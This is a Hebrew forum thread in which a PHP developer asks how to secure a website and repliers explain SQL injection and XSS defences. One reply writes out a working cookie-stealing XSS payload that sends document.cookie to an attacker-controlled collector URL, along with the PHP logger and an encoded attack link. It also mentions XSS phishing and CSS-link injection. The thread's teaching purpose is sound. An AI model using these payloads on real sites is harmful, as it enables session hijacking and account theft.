צהריים טובים,

אני בונה כל מיני מערכות שונות בPHP,
ותמיד אני שומע פירצות אבטחה, אבטחת מידע, וכל שאר הדרכים שהם האקרים יכולים לפרוץ או לשלוח פקודות שונות, ולקבל גישות לאתר.


הייתי רוצה ללמוד כיצד אפשר להגן על האתר שלי, וללמוד איך מוצאים פירצות אבטחה.

אני מחפש מדריכים בעברית בלבד [נושא חדש אני לא נוהג ללמוד באנגלית],
בנושא,
או שמישהו מכאן שיודע את הנושא ומוכן ללמד אותי בפרטי [שלב אחרי שלב], או כאן בפורום, שכל מי שירצה ילמד גם כן.

[תמורה? לא חושב שבשביל דבר כזה צריך.]



תודה.

אבטחה יכול להיות 101 דברים
כדאי לך לאבטח את ה POST וה GET על ידי פונקציה שאתה מוריד את ה > ו <

כדי לך להגן על MYSQL ב mysql_escaping_script

יש עוד דברים

אבל תתמקד ספציפית

אני רוצה להתמקד בנושא של חורי אבטחה.
[אם זו הכוונה],

דרכים שהאקרים יכולים לגלות נתונים על האתר ודרך שם להיכנס ולקבל גישות.

נגיד יש היום ברשת הרבה אתרים שנפרצו ורשום בהם: HACKED BY...

אני רוצה לדעת וללמוד דרכים לחסום את זה.

אני חושב שההתקפות הנפוצות שקשורות לקוד שאתה בונה, אני לא מדבר על התקפה על השרת שאתה מריץ, הן SQL Injection ו XSS.

אתה יכול לקרוא פה מדריך מקיף מאוד על SQL Injection.
הדוגמאות שהם נותנים שם זה אומנם לא על PHP ו MySQL, אבל זה אותו עיקרון..
כל מחרוזת שאתה מקבל מהמשתמש ונכנסת לתוך שאילתה צריכה לעבור בדיקה - אם זה מספר אתה צריך לבדוק שזה באמת מספר/להפוך את זה למספר
אם זה מחרוזת אתה צריך לעשות על זה mysql_real_escape_string.

בקשר ל XSS - אתה צריך להפעיל htmlspecialchars על כל דבר שאתה מקבל מהמשתמש ומציג באתר.
אם אתה מקבל מהמשתמש ומכניס לדאטאבייס, אתה צריך לעשות את זה כשאתה מוציא את המידע

כמובן שיש עוד הרבה דברים פגיעים, לפעמים אנשים מקבלים מיקום של קובץ ועושים לו include בלי לבדוק את הקובץ, מה שמאפשר לעיתים הזרקת קוד PHP לאתר.

לפעמים לוקחים מידע מהמשתמש, ובגלל שהוא הוגדר בעוגיה, או ב input שהוא hidden חושבים שהמידע הזה בטוח, אז שמים נגיד עוגיה עם המספר משתמש בלי לוודאות את זה לפי סיסמא, עוגיה שאומרת אם אתה מנהל או לא, וכל מיני כאלה.

לפעמים שמים את הניהול בדף כלשהו ולא מגנים עליו, וחושבים שפשוט אף אחד לא ידע למצוא את זה.. ואז אפשר לנסות לנחש את זה

והרשימה עוד ארוכה... תחפש בגוגל, ולפי דעתי כדאי שתקרא באנגלית, כי בעברית אתה לא תמצא הרבה מידע בנושא.

ואו,
זה אחד מהתשבוות שציפיתי לקבל =]

ואני מודה לך.

בקשר למאמרים באנגלית,
זה לא שיש לי בעיה, אבל נושא חדש שאני לא מתמצא בו, יותר קשה לי מלנחדש הסברים שאני כן מבין בהם.


בקשר לקישורים שנתת לי,
אני אבדוק אותם.


אם תוכל רק לפרט מעט מה זה XSS,
זה משהו חדש לי =\


ושוב תודה רבה.

הוא נתן לך פונקציה שהופכת תווים של HTML ל"תווים מיוחדים" (כמו &quot

אז אני מניח שזה מונע מהצגת HTML וקודי JAVA SCRIPT וכל זה.

דרך אגב, אתה בטוח שזו האבטחה היחידה? כי זה נראה לי יותר מדיי קל לאבטח לפי מה שאתה אומר.

ואם זה ככה, אז לא היו מערכות פורומים למשל, שהיו כל כך פרוצות.

לא יודע, נראה לי פשוט מדיי

XSS זה למעשה במקור CSS, אבל כותבים XSS כדי למנוע בלבול בין זה לבין גליונות עיצוב מדורגים.
בכל מקרה, CSS זה ראשי תיבות של Cross Site Scripting

יהיה לי יותר קל לתת דוגמה מאשר להסביר, אז אני אתן דוגמה
בוא נגיד שיש לך דף הרשמה, שנקרא register.php
בין השאר, כתוב שם

קוד PHP:

<?php
if (isset($_GET['error'])) echo "Error: ".$_GET['error']."<br/>\n";
?>

המטרה של זה זה להציג שגיאה, למשל אם נרשמים אם משתמש שכבר קיים, זה יפנה ל register.php?error=this username is already in use
עכשיו, זה אמור לקבל מחרוזת, אבל במקרה שיכנסו ל
register.php?error=HTML CODE
זה יכניס את זה בתור הפלט שנכנס למשתמש.
למה זה טוב לתוקף פוטנציאלי? הוא יכול להריץ JS דרך האתר שלך,
לקוד JS שמורץ דרך האתר שלך יש גישה לעוגיות, ואפשר להשתמש בזה בשביל לגנוב עוגיות
ב JS יש את document.cookie שמכיל את כל העוגיות, בעזרת קוד JS של שורה אחת אפשר לשלוח את כל העוגיות לסקריפט חיצוני של התוקף שישמור את זה.. והוא אחר כך יוכל להשתמש בזה בשביל להתחבר בתור משתמש אחר.
דוגמה לקוד שיעשה דבר כזה -

קוד:

<script type="text/javascript">
	document.location="http://host/path/to/file.php?c="+escape(document.cookie);
</script>

והקוד PHP שישמור את זה

קוד PHP:

<?php
$fp=fopen('log.txt', (is_file('log.txt') ? 'a' : 'w'));
fwrite($fp, $_GET['c']."\n");
?>

ואם נעשה את זה דרך register.php, זה יהיה

קוד:

register.php?error=%3Cscript+type%3D%22text%2Fjava  script%22%3Edocument.location%3D%22http%3A%2F%2Fho  st%2Fpath%2Fto%2Ffile.php%3Fc%3D%22%2Bescape(docum  ent.cookie)%3B%3C%2Fscript%3E

למעשה כל מי שיקבל את הלינק הזה, ישלח את העוגיות שלו לסקריפט של התוקף.


שימוש נוסף שיש ל XSS זה ל phisging
משתמשים בזה בשביל להראות בתוך הדף טופס שמבקש שם משתמש וסיסמא, וכל הפרטים למעשה נשלחים לסקריפט של התוקף.
מי שיכנס יחשוד פחות, בגלל שהוא יראה את הדומיין של האתר האמיתי

הפתרון לבעיה הזאת היא להפוך את מה שאמור להיות מספר למספר (בעזרת casting ל int או עם intval), ולמה שאמור להיות מחרוזת לעשות htmlspecialchars.


בע, אחרי שסיימתי לכתוב מצאתי מדריך
http://bv.spotquick.com/showtext.ph...okie%20Hack.txt

<link rel="stylesheet" type="text/css" href="http://host/path/to/file.php?null=.css" />

ובתוך הקובץ אתה יכול לגנוב עוגייות
להשתמש באתר המוזרק כ מירור בשביל להריץ אינגקשן
להעביר את העמוד
וכו.

GNU/Linux - Use the source!

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://petition.mac-it.co.il/promote/buttons/petition_text_less.gif]

דרדה, הממ
לא נראה לי שהדפדפן ישלח לשם את העוגיות... הוא שולח לפי הדומיין והתיקיה.. עד כמה שאני יודע :\

עוגיות לא בדקתי

GNU/Linux - Use the source!

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://petition.mac-it.co.il/promote/buttons/petition_text_less.gif]